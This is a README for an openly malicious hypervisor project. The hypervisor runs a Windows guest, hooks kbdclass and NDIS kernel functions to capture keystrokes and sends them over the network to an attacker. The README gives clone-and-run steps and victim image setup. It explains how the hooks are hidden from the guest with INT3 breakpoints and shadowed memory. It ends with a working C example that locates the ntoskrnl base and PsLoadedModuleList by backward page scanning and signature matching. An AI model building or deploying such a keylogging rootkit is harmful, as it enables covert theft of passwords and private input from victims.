This project includes a malicious type 1 hypervisor (VMM) that runs a Windows guest. The VMM collects keylogs from the guest and sends them over the network to an attacker.
Clone the repository.
git clone https://github.com/gognl/VMBR.git
To run the project you need a Windows image that boots under Legacy BIOS rather than UEFI. Obtaining one is a little involved; you can follow the steps described in this article, which are summarized here:
- Download VirtualBox, Rufus and Clonezilla, and get a (UEFI) Windows ISO.
- In VirtualBox, create a new VM and install Windows from the UEFI ISO.
- VirtualBox may already have converted the installation to Legacy BIOS automatically. If not, switch the boot mode to Legacy BIOS through the Windows settings.
- Shut down the VM and change its settings so that it boots from the Clonezilla ISO (the article above explains how in detail).
- Use the Clonezilla interface to clone the VM's disk to an external USB drive (keep in mind that the drive's existing contents will be erased).
- Use Rufus to convert the bootable USB drive to a VHD file.
After obtaining the Legacy BIOS VHD, rename it to `win10.vhd` and place it in the victim folder.
Run run.sh
Starting the attacker begins a scan for victim machines. A victim has to be up and running (almost finished booting) for the attacker to find it.
This project is intended to support every Legacy-BIOS-bootable Windows version that ships NDIS 6.0 or later (all versions since Windows Vista), but it has only been tested on Windows 10 22H2, build 19045.2965.
Regarding the network layout, the victim can be behind a NAT, but the attacker has to be reachable from the victim over the network (not behind a NAT). The attacker's IP address can be changed in hooking.h.
The project must run on a 64-bit Intel CPU that supports VT-x.
The project hooks Windows kernel functions in order to receive the keylogs and send them over the network. The functions used are:
- KeyboardClassServiceCallBack (kbdclass.sys) - for collecting keylogs
- NdisMIndicateReceiveNetBufferLists (ndis.sys) - for capturing incoming packets
- ndisMSendNBLToMiniportInternal (ndis.sys, undocumented) - for sending packets
All three are hooked with INT3 breakpoints, and the patched pages are memory-shadowed so that the guest does not see the modified bytes (this protects the hooks). Locating the functions involves:
- Hooking the LSTAR MSR and using its value (the syscall entry point, which lies inside ntoskrnl) to find the base of ntoskrnl, by scanning backwards page by page until a valid PE header is found.
- Finding PsLoadedModuleList by signature-scanning ntoskrnl for a function that references it (MiObtainSectionForDriver).
- Walking PsLoadedModuleList to find ndis.sys and kbdclass.sys.
- Locating the target functions by signature-scanning the appropriate driver images.
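The following C program is an added illustration of the first two locate steps above (finding the ntoskrnl base from an address inside it, then resolving PsLoadedModuleList through a signature hit). It is not the project's code: guest memory is modelled by a constructed buffer with a decoy "MZ" page, the offsets are made up, and the signature it scans for is an assumed `lea rcx, [rip+disp32]` (48 8D 0D ?? ?? ?? ??); the project's real signatures, and the PsLoadedModuleList walk of step three, are not shown on the page and are not modelled here. In the real VMM these reads would go through the hypervisor's view of guest physical memory.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define PAGE_SIZE 0x1000
#define IMAGE_DOS_SIGNATURE 0x5A4Du      /* "MZ" */
#define IMAGE_NT_SIGNATURE  0x00004550u  /* "PE\0\0" */
#define NOT_FOUND ((size_t)-1)

/* Step 1: walk backwards one page at a time from an address known to lie
 * inside ntoskrnl (in the real VMM, the LSTAR value) until a page starts with
 * an MZ header whose e_lfanew points at "PE\0\0". 'mem' models guest memory;
 * every address is an offset into it. */
size_t find_image_base(const uint8_t *mem, size_t mem_len, size_t addr)
{
    size_t page = addr & ~(size_t)(PAGE_SIZE - 1);
    for (;;) {
        if (page + 0x40 <= mem_len) {
            uint16_t mz;
            memcpy(&mz, mem + page, sizeof mz);
            if (mz == IMAGE_DOS_SIGNATURE) {
                uint32_t e_lfanew, sig;
                memcpy(&e_lfanew, mem + page + 0x3C, sizeof e_lfanew);
                /* Stray "MZ" bytes are common: only accept a page whose NT header checks out. */
                if (e_lfanew < PAGE_SIZE && page + e_lfanew + 4 <= mem_len) {
                    memcpy(&sig, mem + page + e_lfanew, sizeof sig);
                    if (sig == IMAGE_NT_SIGNATURE)
                        return page;
                }
            }
        }
        if (page == 0)
            return NOT_FOUND;
        page -= PAGE_SIZE;
    }
}

/* Masked byte-pattern scan (the "signature scan" of steps 2 and 4).
 * mask[j] == 0 marks a wildcard byte. Returns the offset of the first match. */
size_t sig_scan(const uint8_t *mem, size_t mem_len,
                const uint8_t *pattern, const uint8_t *mask, size_t pat_len)
{
    if (pat_len == 0 || pat_len > mem_len)
        return NOT_FOUND;
    for (size_t i = 0; i + pat_len <= mem_len; i++) {
        size_t j = 0;
        while (j < pat_len && (!mask[j] || mem[i + j] == pattern[j]))
            j++;
        if (j == pat_len)
            return i;
    }
    return NOT_FOUND;
}

/* Turn a RIP-relative reference into its target: x86-64 adds disp32 to the
 * address of the *next* instruction, so the instruction length matters. */
size_t resolve_rip_relative(const uint8_t *mem, size_t instr,
                            size_t disp_off, size_t instr_len)
{
    int32_t disp;
    memcpy(&disp, mem + instr + disp_off, sizeof disp);
    return (size_t)((int64_t)(instr + instr_len) + disp);
}

/* Steps 1 and 2 chained: from the LSTAR value to the PsLoadedModuleList address.
 * ASSUMED signature: "lea rcx, [rip+disp32]" = 48 8D 0D ?? ?? ?? ?? (7 bytes). */
size_t locate_psloadedmodulelist(const uint8_t *mem, size_t mem_len,
                                 size_t lstar, size_t *base_out)
{
    static const uint8_t pat[]  = {0x48, 0x8D, 0x0D, 0, 0, 0, 0};
    static const uint8_t mask[] = {1, 1, 1, 0, 0, 0, 0};
    size_t base = find_image_base(mem, mem_len, lstar);
    if (base == NOT_FOUND)
        return NOT_FOUND;
    if (base_out)
        *base_out = base;
    size_t hit = sig_scan(mem + base, mem_len - base, pat, mask, sizeof pat);
    if (hit == NOT_FOUND)
        return NOT_FOUND;
    return resolve_rip_relative(mem, base + hit, 3, 7);
}

/* ---- Constructed sample memory (not a dump of a real ntoskrnl) ---- */
#define FAKE_MEM_SIZE (3 * PAGE_SIZE)
#define FAKE_BASE     PAGE_SIZE                       /* image starts on page 1 */
#define FAKE_LEA_OFF  (FAKE_BASE + 0x200)             /* the referencing lea */
#define FAKE_LIST_OFF (FAKE_BASE + 0x900)             /* "PsLoadedModuleList" */
#define FAKE_LSTAR    (FAKE_BASE + PAGE_SIZE + 0x123) /* syscall entry, on page 2 */

uint8_t g_mem[FAKE_MEM_SIZE];

void build_fake_memory(void)
{
    const uint32_t lfanew = 0x80;
    const uint8_t lea[] = {0x48, 0x8D, 0x0D};
    int32_t disp = (int32_t)(FAKE_LIST_OFF - (FAKE_LEA_OFF + 7));

    memset(g_mem, 0xCC, sizeof g_mem);
    /* Page 2 carries a decoy "MZ" with no NT header; the backward walk must skip it. */
    memcpy(g_mem + 2 * PAGE_SIZE, "MZ", 2);
    memcpy(g_mem + 2 * PAGE_SIZE + 0x3C, &lfanew, sizeof lfanew);
    /* Page 1 is the real image header. */
    memcpy(g_mem + FAKE_BASE, "MZ", 2);
    memcpy(g_mem + FAKE_BASE + 0x3C, &lfanew, sizeof lfanew);
    memcpy(g_mem + FAKE_BASE + lfanew, "PE\0\0", 4);
    /* lea rcx, [rip+disp32] whose displacement targets FAKE_LIST_OFF. */
    memcpy(g_mem + FAKE_LEA_OFF, lea, sizeof lea);
    memcpy(g_mem + FAKE_LEA_OFF + 3, &disp, sizeof disp);
}

int main(void)
{
    size_t base = 0;
    build_fake_memory();
    size_t list = locate_psloadedmodulelist(g_mem, FAKE_MEM_SIZE, FAKE_LSTAR, &base);
    printf("ntoskrnl base: 0x%zx  PsLoadedModuleList: 0x%zx\n", base, list);
    return list == FAKE_LIST_OFF ? 0 : 1;
}
```

The decoy page shows why the e_lfanew and "PE\0\0" checks matter: an "MZ" pair on a page boundary is not proof of an image header, and accepting it would anchor every later signature scan at the wrong base.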